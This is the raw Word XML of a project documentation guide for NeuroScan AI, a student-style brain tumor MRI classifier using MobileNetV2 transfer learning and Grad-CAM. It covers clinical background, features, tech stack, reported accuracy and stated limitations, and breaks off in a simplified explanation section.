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color w:val="1E3A8A"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>PROJECT DOCUMENTATION &amp; MASTER LEARNING GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>NeuroScan AI — Brain Tumor Detection &amp; Explainable AI (Grad-CAM)</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rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Project System: NeuroScan AI Medical Diagnostic System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Author &amp; Engineer: Aditya Sarapure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Target Platform: Python 3.11 / TensorFlow 2.15 / Streamlit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Documentation Type: Master Technical Reference &amp; Learning Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1E40AF"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Chapter 1: Project Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.1 Project Overview &amp; Official Identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Project Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NeuroScan AI — Brain Tumor Detection &amp; Diagnostic Studio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Domain:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medical Computer Vision, Clinical Decision Support Systems (CDSS), Explainable Artificial Intelligence (XAI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Primary Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> To provide real-time, four-class intracranial tumor diagnosis from magnetic resonance imaging (MRI) scans with integrated gradient-weighted spatial explainability (Grad-CAM).</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1.2 Problem Statement &amp; Clinical Relevance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Brain tumors represent some of the most lethal and diagnostically challenging neoplasms in modern oncology. Among primary central nervous system (CNS) lesions, three major histological and anatomical varieties predominate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Gliomas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malignant, highly infiltrative intra-axial tumors originating from glial supportive tissue (astrocytomas, oligodendrogliomas, glioblastoma multiforme). Because they intermingle with healthy neural parenchyma, early border identification is life-critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Meningiomas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extra-axial intracranial tumors arising from the arachnoid cells of the meninges surrounding the brain. Although predominantly benign, their compressive mass effect can cause irreversible neurological deficits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pituitary Adenomas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sellar neoplasms growing from the pituitary gland at the base of the skull, immediately adjacent to the optic chiasm. Left untreated, they cause endocrine failure and bilateral visual field blindness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Normal / Healthy Anatomy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Absence of space-occupying intracranial lesions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Diagnostic Bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Radiologists examine hundreds of high-resolution MRI slices daily. High diagnostic volume creates cognitive fatigue, leading to missed micro-lesions, inter-observer diagnostic variability, and delayed surgical intervention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The "Black-Box" AI Dilemma in Healthcare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>While Deep Learning models can classify medical images with high mathematical precision, traditional neural networks are inscrutable "black boxes." A neural network might output: *"Meningioma: 95% Confidence"*, but offer no explanation for *why*. If the network secretly based its decision on scanner artifacts, patient motion blur, or skull clamp metal, treating physicians could make fatal surgical errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NeuroScan AI solves this exact problem by marrying high-accuracy transfer learning with mathematically grounded visual explainability (Grad-CAM).</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1.3 Who Uses NeuroScan AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Neuroradiologists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> As a diagnostic second-opinion tool during high-volume screening shifts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Neurosurgeons:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> For rapid visual orientation and verification of tumor margin regions prior to biopsy or craniotomy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Emergency Medicine Physicians:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In trauma centers to rapidly triage acute neurological admissions and rule out mass effect or herniation risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Medical Imaging Researchers &amp; Students:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> As an open, transparent platform to study how convolutional filters respond to intracranial pathologies.</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1.4 Main Objectives and Implemented Features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Perform multi-class classification into four distinct radiological categories (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>glioma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>meningioma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pituitary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Minimize false negative diagnoses for tumor presence, ensuring no patient with an active neoplasm is mistakenly discharged as healthy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Provide zero-cost visual localization of the tumor bed without requiring expensive, time-consuming manual pixel masks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Deliver an interactive, zero-latency clinical dashboard accessible via any modern web browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implemented Features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Full-Pipeline Deep Learning Engine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Built on TensorFlow/Keras using transfer learning with a MobileNetV2 backbone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Empirically Validated 86.12% Test Accuracy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evaluated across 1,600 untouched, previously unseen test MRI scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>99.0% Healthy Brain Recall:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Near-zero false alarms for tumor presence on normal brain scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Real-Time Grad-CAM Saliency Studio:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Computes gradients at the final convolutional feature layer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>out_relu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) to generate thermal overlays highlighting the tumor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Interactive Streamlit Web Dashboard (`app.py`):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Features dual input modes (file upload + pre-loaded test gallery), multi-class probability bars, and sub-second in-memory model caching.</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1.5 Technology Stack</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20" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Layer</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Technology</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Version</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Purpose in Project</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**Language**</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Python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3.11.x</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Core programming language</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**Deep Learning**</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TensorFlow / Keras</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&gt;= 2.15.0</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Neural network construction, training loop, and Grad-CAM backpropagation</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**Scientific Computing**</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NumPy</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&gt;= 1.24.0, &lt; 2.0.0</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Multi-dimensional tensor operations, array manipulation, and probability math</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**Data Analysis**</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Pandas</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&gt;= 2.0.0</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Tabular dataset tracking and audit record storage</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**Computer Vision**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OpenCV (`opencv-python`)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&gt;= 4.8.0</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Image resizing, color-space conversion (BGR/RGB), and Jet colormap generation</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**Image IO**</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Pillow (PIL)</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&gt;= 9.5.0</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High-fidelity image decoding and Streamlit file stream handling</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**Evaluation Metrics**</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Scikit-Learn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&gt;= 1.3.0</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Multi-class classification report, precision, recall, and confusion matrix</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**Visualizations**</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Matplotlib &amp; Seaborn</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&gt;= 3.7.0 / &gt;= 0.12.0</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Training convergence curves and confusion matrix heatmaps</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**Web Frontend**</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Streamlit</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&gt;= 1.30.0</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Reactive, in-memory clinical dashboard with dark-mode glassmorphic styling</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1.6 Inputs and Outputs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w:t>
              <w:br/>
              <w:t>|                        INPUT DATA                           |</w:t>
              <w:br/>
              <w:t>|  - Axial, Coronal, or Sagittal Cranial MRI Slice            |</w:t>
              <w:br/>
              <w:t>|  - Formats: JPEG, JPG, PNG                                  |</w:t>
              <w:br/>
              <w:t>|  - Dimensions: Arbitrary (Rescaled automatically to 224x224)|</w:t>
              <w:br/>
              <w:t>|  - Channels: Grayscale (L), RGB, or RGBA (Normalized to RGB)|</w:t>
              <w:br/>
              <w:t>+-------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                              |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                              v</w:t>
              <w:br/>
              <w:t xml:space="preserve">                  [ NEUROSCAN AI PIPELINE ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                              |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                              v</w:t>
              <w:br/>
              <w:t>+-------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t>|                       OUTPUT RESULTS                        |</w:t>
              <w:br/>
              <w:t>|  1. Primary Diagnostic Class (e.g., "Pituitary Tumor")       |</w:t>
              <w:br/>
              <w:t>|  2. Confidence Percentage (e.g., "99.4%")                   |</w:t>
              <w:br/>
              <w:t>|  3. Multi-Class Probability Breakdown (All 4 classes)       |</w:t>
              <w:br/>
              <w:t>|  4. Grad-CAM Attention Heatmap (Thermal activation map)     |</w:t>
              <w:br/>
              <w:t>|  5. Superimposed Diagnostic Overlay (Scan + Glowing Marker) |</w:t>
              <w:br/>
              <w:t>+-------------------------------------------------------------+</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1.7 Current Project Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>2D Slice Processing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The model operates on single 2D slices rather than fully volumetric 3D DICOM volumes (e.g., multi-planar 3D T1-contrast, T2-FLAIR sequences).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Glioma vs. Meningioma Boundary Confusion:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the MobileNetV2 base feature extractor remains frozen, the network occasionally confuses infiltrative glioma tissue with dural-tail meningiomas (67 test gliomas were predicted as meningiomas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Regulatory Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system is an investigational and educational software system, not an FDA-approved medical diagnostic device.</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1.8 Explaining the Project to Three Different Audiences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Like Explaining to a Five-Year-Old Child</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"Imagine your brain is a beautiful, peaceful playground. Sometimes, an unwelcome visitor—like a naughty, sneaky muddy monster—hides inside the playground. A doctor takes a picture of the playground, but the picture is black, gray, and white, making it really hard to spot the muddy monster!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
